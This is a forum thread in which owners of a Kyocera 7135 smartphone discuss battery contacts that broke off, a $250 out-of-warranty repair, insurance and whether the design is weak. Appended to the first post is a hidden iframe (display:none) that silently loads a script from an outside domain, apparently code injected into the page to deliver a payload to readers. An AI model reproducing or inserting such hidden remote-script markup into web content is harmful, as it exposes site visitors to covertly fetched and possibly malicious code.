+ Reply to Thread

Caution - battery contacts can break off - no warranty coverage

Anyone have this problem - -

Inserted battery wrong way. It crushed two of the battery contacts. When I placed them back in position - one broke off!@#$$%@@!#.

Contacted Kyo - not covered under warranty - will cost me $250!@#$%$#@

Anyone else have a problem like this?

All others be warned - those flimsy copper contacts break easily!

Anyone have an idea on how to coax Kyo into not charging the $250 repair charge?

Really bummed - and really missing my 7135...any extra 7135s around? Gotta use this crummy Motorola for next two weeks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Caution - battery contacts can break off - no warranty coverage

Originally posted by ozzir
    Anyone have this problem - -

Inserted battery wrong way. It crushed two of the battery contacts. When I placed them back in position - one broke off!@#$$%@@!#.

Contacted Kyo - not covered under warranty - will cost me $250!@#$%$#@

Anyone else have a problem like this?

All others be warned - those flimsy copper contacts break easily!

Anyone have an idea on how to coax Kyo into not charging the $250 repair charge?

Really bummed - and really missing my 7135...any extra 7135s around? Gotta use this crummy Motorola for next two weeks.
    Probably too late now, but Do you have insurance on your phone? Should have been a $50 deductable instead of a $250 repair charge.

Alan

Hmmm, I swap batteries all the time. I have never hurt my connectors. You would have to bend them from side to side to break them. Putting in te battery wrong will still only depress them just like normal battery insertion.

Heh, the first thing I said when I saw those connectors was "Oh, weak!!" High fail-rate, anyone?
    LART 'em all! Let /root grep 'em out!

In spite of Otter's extensive drop test studies, I still say this baby is not for the accident prone.

This thing is very costly, and has a somewhat delicate nature about it (Flimsy antenea, thin battery contacts).

Don't get me wrong. It is a very solid piece of machinery, and will work fine for most people for a very long time.

However, if you are accident prone and considering purchasing this phone you need to have a lot of $$$, or a good insurance plan.
    If at first you don't succeed, don't try sky diving.

I just purposely tried to stick the battery in mine wrong, and tried to see if I could inadvertantly screw it up. You would have to really screw up putting in the battery to hit those pins wrong.

that's what I thought

Don't get me wrong here - I did NOT jam the battery in there. We are talking about "normal use" here - and the contact broke off. In fact, I don't even think I put the battery in wrong - I am really in a daze as to how this happened - but one thing is for sure - I will not be the only one - there will be others that lose a battery contact - unless my unit just had a bad (thin) contact.

My point is that I do not think this battery placement system is well designed. If I could break it off - and I've gone two years with a Samsung i300 changing batteries with no problems - wait until this puppy gets into general consumer population. I just think this is a bad design - the battery contact actually bends when it touches the battery in normal use - and there is no spring system to support it - the actual copper and it's resiliency is the basis for the contact system design. Seems like a product design flaw to me.

Well, many people may not purchase the extra battery and therfore won't have a problem unless they like fondling the battery for some reason.

Bummer if this is true, Hopefully this is only occuring with a few units.
    iPhone therefore iAm.

Isn't that why there is a big arrow on the battery?
    ~'kito
    pdaPhoneHome Moderator

My battery contacts seem pretty good. In fact everything mechanical about the design of the 7135 seems exceptional -- the design team here deserves a reward.

Administrator
    could have been a design flaw in your unit... these things do happen...